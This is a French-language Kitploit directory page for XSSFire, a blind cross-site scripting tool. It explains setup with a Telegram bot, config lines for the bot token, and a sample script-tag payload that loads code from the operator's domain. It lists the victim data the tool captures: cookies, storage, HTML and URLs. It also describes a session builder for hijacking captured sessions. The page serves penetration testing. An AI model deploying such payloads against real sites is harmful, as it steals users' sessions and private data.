Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
XSSFire — Un script Blind XSS autonome. | Kitploit
Outils/GitHubGitHub/seifelsallamy/xssfire
ExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubseifelsallamy/xssfire

XSSFire

Un script Blind XSS autonome.

Voir le dépôt
47104il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

XSSFire

Un script Blind XSS autonome.

Comment ça marche :

Le script est une combinaison de PHP et JavaScript. Il capture les données à l'aide de JS et les envoie au script lui-même, puis il génère des fichiers de rapport et les livre via Telegram.

Prérequis :

  1. Serveur web fonctionnant sous Linux avec un domaine et un certificat SSL.
  2. Compte Telegram (pour recevoir les rapports BXSS)

Pourquoi Telegram ?

Facile à configurer. Rapide. Accessible.

Fonctionnalités :

  1. Capture : IP, User-Agent, Date-Heure, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, si déclenché depuis une iframe
  2. Constructeur de session : un JavaScript qui peut reconstruire la session, ouvrir l'URL capturée et les outils de développement, puis le coller dans la console et appuyer sur Entrée. Si vous avez de la chance, vous pouvez prendre le contrôle de la session.
  3. Notifications Telegram : plus rapides et plus faciles à configurer que les e-mails et plus accessibles.
  4. Anti-spam : vous ne devriez recevoir qu'une ou deux notifications pour chaque URL capturée. Cependant, le script se réinitialise de temps en temps pour vous notifier à nouveau plus tard.
  5. Chiffrement : vous pouvez définir un mot de passe dans le script et le rapport que vous recevez sur Telegram sera un fichier zip protégé par un mot de passe. (Les bots Telegram n'utilisent pas le chiffrement de bout en bout).
  6. Instantané HTML : c'est un fichier HTML qui sera livré avec le rapport, il devrait ressembler à la page de votre cible.

Configuration :

  1. Allez sur Telegram et discutez avec @botfather.
Télécharger l’outil
  • Écrivez /start dans le chat et créez un nouveau bot.
  • Vous devriez recevoir votre jeton de bot lorsque vous le créez.
  • Conservez le jeton de côté.
  • Allez maintenant dans le chat de votre bot nouvellement créé, démarrez-le puis dites bonjour.
  • Ensuite, allez sur : https://api.telegram.org/bot<bot_token>/getUpdates
  • Et enregistrez votre identifiant de chat.
  • Ouvrez le script XSSFire et modifiez les lignes suivantes :
  • root@kitploit:~
    $chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
    $token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
    $password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
    
    1. Téléversez le script sur votre serveur.

    Pour générer des payloads, vous pouvez envisager d'utiliser le Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager. Vous pouvez simplement créer des payloads via cette extension en saisissant yourdomain.com/

    Remarque : vous pouvez changer le nom du fichier en index.php et le téléverser dans le répertoire principal de votre serveur pour raccourcir les payloads, le payload devrait alors ressembler à ceci <script src="https://yourdomain.com"></script>.

    Captures d'écran :

    bxss
    bxss2
    bxss3

    Merci à GPT-3 xD